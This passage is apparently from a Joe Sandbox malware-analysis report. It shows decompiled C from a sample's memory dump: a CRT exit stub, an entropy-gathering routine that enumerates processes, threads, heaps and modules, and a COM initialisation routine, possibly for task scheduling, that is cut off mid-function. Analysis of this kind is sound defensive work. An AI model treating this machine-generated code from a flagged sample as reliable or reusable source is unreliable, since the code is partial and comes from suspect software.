Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00427F3D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00427f40
0x00427f42
0x00427f44
0x00427f47
0x00427f50

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E00481920() {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				char _v144;
				struct _MEMORYSTATUS _v176;
				struct _OSVERSIONINFOA _v324;
				char _v620;
				char _v1168;
				long _v1172;
				char _v1176;
				_Unknown_base(*)()* _v1180;
				struct HINSTANCE__* _v1184;
				_Unknown_base(*)()* _v1188;
				_Unknown_base(*)()* _v1192;
				char _v1196;
				void* _v1200;
				_Unknown_base(*)()* _v1204;
				_Unknown_base(*)()* _v1208;
				_Unknown_base(*)()* _v1212;
				_Unknown_base(*)()* _v1216;
				char _v1220;
				_Unknown_base(*)()* _v1224;
				_Unknown_base(*)()* _v1228;
				_Unknown_base(*)()* _v1232;
				_Unknown_base(*)()* _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr* _v1248;
				intOrPtr _v1252;
				char _v1284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t188;
				struct HINSTANCE__* _t194;
				struct HINSTANCE__* _t195;
				struct HINSTANCE__* _t196;
				intOrPtr* _t197;
				struct HINSTANCE__* _t198;
				struct HINSTANCE__* _t199;
				struct HINSTANCE__* _t200;
				intOrPtr* _t226;
				intOrPtr* _t237;
				long _t285;
				intOrPtr* _t289;
				intOrPtr* _t290;
				void* _t345;
				void* _t346;
				_Unknown_base(*)()* _t347;
				_Unknown_base(*)()* _t348;
				_Unknown_base(*)()* _t353;
				_Unknown_base(*)()* _t357;
				_Unknown_base(*)()* _t359;
				void* _t360;
				intOrPtr* _t363;
				void* _t364;
				struct HINSTANCE__* _t366;
				intOrPtr _t367;
				signed int _t368;
				void* _t369;
				intOrPtr _t370;

				_push(0xfffffffe);
				_push(0x508360);
				_push(E004285C0);
				_push( *[fs:0x0]);
				_t370 = _t369 - 8;
				E0042F7C0(0x4e8);
				_t187 =  *0x50ad20; // 0x727261cc
				_v12 = _v12 ^ _t187;
				_t188 = _t187 ^ _t368;
				_v32 = _t188;
				_push(_t345);
				_push(_t188);
				 *[fs:0x0] =  &_v20;
				_v28 = _t370;
				_v1196 = 0;
				_t359 = 0;
				_v1224 = 0;
				_v324.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v324);
				_v1188 = LoadLibraryA("ADVAPI32.DLL");
				_v1184 = LoadLibraryA("KERNEL32.DLL");
				_t194 = LoadLibraryA("NETAPI32.DLL");
				_v1212 = _t194;
				_t347 = 0;
				_v1192 = 0;
				_v1172 = 0;
				_v1180 = 0;
				_v1208 = 0;
				_t357 = 0;
				_v1204 = 0;
				_t363 = GetProcAddress;
				if(_t194 != 0) {
					_v1208 = GetProcAddress(_t194, "NetStatisticsGet");
					_t357 = GetProcAddress(_v1212, "NetApiBufferFree");
					_v1204 = _t357;
					_t347 = _v1208;
				}
				if(_t347 != 0 && _t357 != 0) {
					_push( &_v1176);
					_push(0);
					_push(0);
					_push(L"LanmanServer");
					_push(0);
					if( *_v1208() == 0) {
						E0042F7C0(8);
						asm("movsd xmm0, [0x4f6e60]");
						asm("movsd [esp], xmm0");
						E0045D550(_t345, _t359, _t363, _t368, _v1176, 0x44);
						_t370 = _t370 + 0x10;
						_v1204(_v1176);
					}
				}
				_t195 = _v1212;
				if(_t195 != 0) {
					FreeLibrary(_t195);
				}
				_t196 = _v1188;
				if(_t196 == 0) {
					_t348 = 0;
				} else {
					_v1192 = GetProcAddress(_t196, "CryptAcquireContextW");
					_v1172 = GetProcAddress(_v1188, "CryptGenRandom");
					_t348 = GetProcAddress(_v1188, "CryptReleaseContext");
					_v1180 = _t348;
				}
				_t197 = _v1192;
				if(_t197 != 0 && _v1172 != _t359 && _t348 != 0) {
					_push(0xf0000000);
					_push(1);
					_push(0);
					_push(0);
					_push( &_v1196);
					if( *_t197() != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1196);
						if(_v1172() != 0) {
							E0042F7C0(8);
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v96, 0x40);
							_t370 = _t370 + 0x10;
							_t359 = 1;
							_v1224 = 1;
						}
						_v1180(_v1196, 0);
					}
					_push(0);
					_push(0x16);
					_push(L"Intel Hardware Cryptographic Service Provider");
					_push(0);
					_push( &_v1196);
					if( *_v1192() != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1196);
						if(_v1172() != 0) {
							E0042F7C0(8);
							asm("movsd xmm0, [0x4f6e70]");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v96, 0x40);
							_t370 = _t370 + 0x10;
							_t359 = 1;
							_v1224 = 1;
						}
						_v1180(_v1196, 0);
					}
				}
				_t198 = _v1188;
				if(_t198 != 0) {
					FreeLibrary(_t198);
				}
				if(_v324.dwPlatformId != 2 || E004549A0(_t345) == 0) {
					_t199 = LoadLibraryA("USER32.DLL");
					_v1180 = _t199;
					if(_t199 != 0) {
						_v1200 = GetProcAddress(_t199, "GetForegroundWindow");
						_v1216 = GetProcAddress(_v1180, "GetCursorInfo");
						_t363 = GetProcAddress(_v1180, "GetQueueStatus");
						_t289 = _v1200;
						if(_t289 != 0) {
							_v1200 =  *_t289();
							E0042F7C0(8);
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v1200, 4);
							_t370 = _t370 + 0x10;
						}
						_t290 = _v1216;
						if(_t290 != 0 && (_v324.dwPlatformId != 2 || _v324.dwMajorVersion >= 5) && _t290 != 0) {
							_v116 = 0x14;
							_push( &_v116);
							if( *_t290() != 0) {
								E0042F7C0(8);
								asm("movsd xmm0, [0x4f6e38]");
								asm("movsd [esp], xmm0");
								E0045D550(_t345, _t359, _t363, _t368,  &_v116, _v116);
								_t370 = _t370 + 0x10;
							}
						}
						if(_t363 != 0) {
							_v1220 =  *_t363(0xbf);
							E0042F7C0(8);
							asm("movsd xmm0, [0x4d75f0]");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v1220, 4);
							_t370 = _t370 + 0x10;
						}
						FreeLibrary(_v1180);
					}
				}
				_t200 = _v1184;
				if(_t200 == 0) {
					L92:
					E00482470(_t345, _t359, _t363, _t368);
					GlobalMemoryStatus( &_v176);
					E0042F7C0(8);
					asm("movsd xmm0, [0x4d75f0]");
					asm("movsd [esp], xmm0");
					E0045D550(_t345, _t359, _t363, _t368,  &_v176, 0x20);
					_v1220 = GetCurrentProcessId();
					E0042F7C0(8);
					asm("movsd xmm0, [0x4d75f0]");
					asm("movsd [esp], xmm0");
					E0045D550(_t345, _t359, _t363, _t368,  &_v1220, 4);
					 *[fs:0x0] = _v20;
					_pop(_t360);
					_pop(_t364);
					_pop(_t346);
					return E0042A77E(_t346, _v32 ^ _t368, _t357, _t360, _t364);
				} else {
					_v1172 = 0;
					_v1208 = 0;
					_t363 = GetProcAddress;
					_v1180 = GetProcAddress(_t200, "CreateToolhelp32Snapshot");
					_v1248 = GetProcAddress(_v1184, "CloseToolhelp32Snapshot");
					_v1192 = GetProcAddress(_v1184, "Heap32First");
					_v1204 = GetProcAddress(_v1184, "Heap32Next");
					_v1212 = GetProcAddress(_v1184, "Heap32ListFirst");
					_v1188 = GetProcAddress(_v1184, "Heap32ListNext");
					_v1236 = GetProcAddress(_v1184, "Process32First");
					_v1228 = GetProcAddress(_v1184, "Process32Next");
					_v1232 = GetProcAddress(_v1184, "Thread32First");
					_v1216 = GetProcAddress(_v1184, "Thread32Next");
					_v1200 = GetProcAddress(_v1184, "Module32First");
					_t353 = GetProcAddress(_v1184, "Module32Next");
					_v1240 = _t353;
					_t226 = _v1180;
					if(_t226 == 0 || _v1192 == 0 || _v1204 == 0 || _v1212 == 0 || _v1188 == 0 || _v1236 == 0 || _v1228 == 0 || _v1232 == 0 || _v1216 == 0 || _v1200 == 0 || _t353 == 0) {
						L91:
						FreeLibrary(_v1184);
						goto L92;
					} else {
						_t363 =  *_t226(0xf, 0);
						_v1176 = _t363;
						if(_t363 == 0xffffffff) {
							goto L91;
						}
						asm("xorps xmm0, xmm0");
						asm("movdqu [ebp-0x6c], xmm0");
						_v112 = 0x10;
						if(_t359 != 0) {
							_t285 = GetTickCount();
							_v1172 = _t285;
							_v1208 = _t285;
						}
						_push( &_v112);
						_push(_t363);
						if(_v1212() == 0) {
							L69:
							_v620 = 0x128;
							_t363 = GetTickCount;
							if(_t359 != 0) {
								_v1172 = GetTickCount();
							}
							_push( &_v620);
							_push(_v1176);
							if(_v1236() == 0) {
								L75:
								_v144 = 0x1c;
								if(_t359 != 0) {
									_v1172 = GetTickCount();
								}
								_push( &_v144);
								_push(_v1176);
								if(_v1232() == 0) {
									L82:
									_v1168 = 0x224;
									if(_t359 != 0) {
										_v1172 = GetTickCount();
									}
									_push( &_v1168);
									_push(_v1176);
									if(_v1200() == 0) {
										L88:
										_t237 = _v1248;
										_push(_v1176);
										if(_t237 == 0) {
											CloseHandle();
										} else {
											 *_t237();
										}
										goto L91;
									} else {
										do {
											E0042F7C0(8);
											asm("movsd xmm0, [0x4f6e58]");
											asm("movsd [esp], xmm0");
											E0045D550(_t345, _t359, _t363, _t368,  &_v1168, _v1168);
											_t370 = _t370 + 0x10;
											_push( &_v1168);
											_push(_v1176);
										} while (_v1240() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
										goto L88;
									}
								} else {
									do {
										E0042F7C0(8);
										asm("movsd xmm0, [0x4f6e50]");
										asm("movsd [esp], xmm0");
										E0045D550(_t345, _t359, _t363, _t368,  &_v144, _v144);
										_t370 = _t370 + 0x10;
										_push( &_v144);
										_push(_v1176);
									} while (_v1216() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
									goto L82;
								}
							} else {
								do {
									E0042F7C0(8);
									asm("movsd xmm0, [0x4f6e58]");
									asm("movsd [esp], xmm0");
									E0045D550(_t345, _t359, _t363, _t368,  &_v620, _v620);
									_t370 = _t370 + 0x10;
									_push( &_v620);
									_push(_v1176);
								} while (_v1228() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
								goto L75;
							}
						} else {
							_t366 = 0x2a;
							_v1180 = 0x2a;
							do {
								E0042F7C0(8);
								asm("movsd xmm0, [0x4f6e40]");
								asm("movsd [esp], xmm0");
								E0045D550(_t345, _t359, _t366, _t368,  &_v112, _v112);
								_t370 = _t370 + 0x10;
								asm("wait");
								_v8 = 0;
								asm("xorps xmm0, xmm0");
								asm("movdqu [ebp-0x500], xmm0");
								asm("movdqu [ebp-0x4f0], xmm0");
								_v1252 = 0;
								_v1284 = 0x24;
								_push(_v104);
								_push(_v108);
								_push( &_v1284);
								if(_v1192() == 0) {
									goto L64;
								}
								_t367 = 0x50;
								_v1244 = 0x50;
								while(1) {
									E0042F7C0(8);
									asm("movsd xmm0, [0x4f6e48]");
									asm("movsd [esp], xmm0");
									E0045D550(_t345, _t359, _t367, _t368,  &_v1284, _v1284);
									_t370 = _t370 + 0x10;
									_push( &_v1284);
									if(_v1204() == 0 || _t359 != 0 && GetTickCount() - _v1172 >= 0x3e8) {
										break;
									}
									_t367 = _t367 - 1;
									_v1244 = _t367;
									if(_t367 > 0) {
										continue;
									}
									break;
								}
								_t366 = _v1180;
								L64:
								asm("wait");
								_v8 = 0xfffffffe;
								_push( &_v112);
								_push(_v1176);
							} while (_v1188() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8) && _t366 > 0);
							goto L69;
						}
					}
				}
			}

0x00481923
0x00481925
0x0048192a
0x00481935
0x00481936
0x0048193e
0x00481943
0x00481948
0x0048194b
0x0048194d
0x00481950
0x00481953
0x00481957
0x0048195d
0x00481960
0x0048196a
0x0048196c
0x00481972
0x00481983
0x00481996
0x004819a3
0x004819ae
0x004819b0
0x004819b6
0x004819b8
0x004819be
0x004819c4
0x004819ca
0x004819d0
0x004819d2
0x004819d8
0x004819e0
0x004819ea
0x004819fd
0x004819ff
0x00481a05
0x00481a05
0x00481a0d
0x00481a6f
0x00481a70
0x00481a72
0x00481a74
0x00481a79
0x00481a85
0x00481a8c
0x00481a91
0x00481a99
0x00481aa6
0x00481aab
0x00481ab4
0x00481ab4
0x00481a85
0x00481aba
0x00481ac2
0x00481ac5
0x00481ac5
0x00481acb
0x00481ad3
0x00481b0d
0x00481ad5
0x00481add
0x00481af0
0x00481b03
0x00481b05
0x00481b05
0x00481b0f
0x00481b17
0x00481b31
0x00481b36
0x00481b38
0x00481b3a
0x00481b42
0x00481b47
0x00481b4c
0x00481b4d
0x00481b4f
0x00481b5d
0x00481b64
0x00481b69
0x00481b6c
0x00481b77
0x00481b7c
0x00481b7f
0x00481b84
0x00481b84
0x00481b92
0x00481b92
0x00481b98
0x00481b9a
0x00481b9c
0x00481ba1
0x00481ba9
0x00481bb4
0x00481bb9
0x00481bba
0x00481bbc
0x00481bca
0x00481bd1
0x00481bd6
0x00481bde
0x00481be9
0x00481bee
0x00481bf1
0x00481bf6
0x00481bf6
0x00481c04
0x00481c04
0x00481bb4
0x00481c0a
0x00481c12
0x00481c15
0x00481c15
0x00481c22
0x00481c36
0x00481c3c
0x00481c44
0x00481c52
0x00481c65
0x00481c78
0x00481c7a
0x00481c82
0x00481c86
0x00481c91
0x00481c96
0x00481c99
0x00481ca7
0x00481cac
0x00481cac
0x00481caf
0x00481cb7
0x00481ccf
0x00481cd9
0x00481cde
0x00481ce5
0x00481cea
0x00481cf2
0x00481cfe
0x00481d03
0x00481d03
0x00481cde
0x00481d08
0x00481d11
0x00481d1c
0x00481d21
0x00481d29
0x00481d37
0x00481d3c
0x00481d3c
0x00481d45
0x00481d45
0x00481c44
0x00481d4b
0x00481d53
0x0048223f
0x0048223f
0x0048224b
0x00482256
0x0048225b
0x00482263
0x00482271
0x0048227f
0x0048228a
0x0048228f
0x00482297
0x004822a5
0x004822b5
0x004822bd
0x004822be
0x004822bf
0x004822cd
0x00481d59
0x00481d5b
0x00481d61
0x00481d6d
0x00481d75
0x00481d88
0x00481d9b
0x00481dae
0x00481dc1
0x00481dd4
0x00481de7
0x00481dfa
0x00481e0d
0x00481e20
0x00481e33
0x00481e46
0x00481e48
0x00481e4e
0x00481e56
0x00482233
0x00482239
0x00000000
0x00481ed9
0x00481edf
0x00481ee1
0x00481eea
0x00000000
0x00000000
0x00481ef0
0x00481ef3
0x00481ef8
0x00481f01
0x00481f03
0x00481f09
0x00481f0f
0x00481f0f
0x00481f18
0x00481f19
0x00481f22
0x00482081
0x00482081
0x0048208b
0x00482093
0x00482097
0x00482097
0x004820a3
0x004820a4
0x004820b2
0x0048210a
0x0048210a
0x00482116
0x0048211a
0x0048211a
0x00482126
0x00482127
0x00482135
0x00482196
0x00482196
0x004821a2
0x004821a6
0x004821a6
0x004821b2
0x004821b3
0x004821c1
0x00482219
0x00482219
0x0048221f
0x00482227
0x0048222d
0x00482229
0x00482229
0x00482229
0x00000000
0x004821c3
0x004821c3
0x004821c8
0x004821cd
0x004821d5
0x004821e7
0x004821ec
0x004821f5
0x004821f6
0x00482202
0x00000000
0x004821c3
0x00482137
0x00482140
0x00482145
0x0048214a
0x00482152
0x00482164
0x00482169
0x00482172
0x00482173
0x0048217f
0x00000000
0x00482140
0x004820b4
0x004820b4
0x004820b9
0x004820be
0x004820c6
0x004820d8
0x004820dd
0x004820e6
0x004820e7
0x004820f3
0x00000000
0x004820b4
0x00481f28
0x00481f28
0x00481f2d
0x00481f33
0x00481f38
0x00481f3d
0x00481f45
0x00481f51
0x00481f56
0x00481f59
0x00481f5a
0x00481f61
0x00481f64
0x00481f6c
0x00481f74
0x00481f7e
0x00481f88
0x00481f8b
0x00481f94
0x00481f9d
0x00000000
0x00000000
0x00481f9f
0x00481fa4
0x00481fb0
0x00481fb5
0x00481fba
0x00481fc2
0x00481fd4
0x00481fd9
0x00481fe2
0x00481feb
0x00000000
0x00000000
0x00482004
0x00482005
0x0048200d
0x00000000
0x00000000
0x00000000
0x0048200d
0x0048200f
0x00482015
0x00482015
0x00482016
0x00482051
0x00482052
0x0048205e
0x00000000
0x00481f33
0x00481f22
0x00481e56

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

CryptAcquireContextW, xrefs: 00481AD5
Heap32ListNext, xrefs: 00481DC7
CloseToolhelp32Snapshot, xrefs: 00481D7B
GetForegroundWindow, xrefs: 00481C4A
NETAPI32.DLL, xrefs: 004819A9
LanmanWorkstation, xrefs: 00481A26
ADVAPI32.DLL, xrefs: 00481989
GetQueueStatus, xrefs: 00481C6B
USER32.DLL, xrefs: 00481C31
NetStatisticsGet, xrefs: 004819E2
LanmanServer, xrefs: 00481A74
Module32Next, xrefs: 00481E39
GetCursorInfo, xrefs: 00481C58
Heap32ListFirst, xrefs: 00481DB4
KERNEL32.DLL, xrefs: 0048199C
$, xrefs: 00481F7E
CryptGenRandom, xrefs: 00481AE3
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
Heap32First, xrefs: 00481D8E
Module32First, xrefs: 00481E26
Process32Next, xrefs: 00481DED
CreateToolhelp32Snapshot, xrefs: 00481D67
Heap32Next, xrefs: 00481DA1
Process32First, xrefs: 00481DDA
Thread32Next, xrefs: 00481E13
NetApiBufferFree, xrefs: 004819F0
CryptReleaseContext, xrefs: 00481AF6
Thread32First, xrefs: 00481E00

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff);
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0, 0xffffffff);
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0");
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
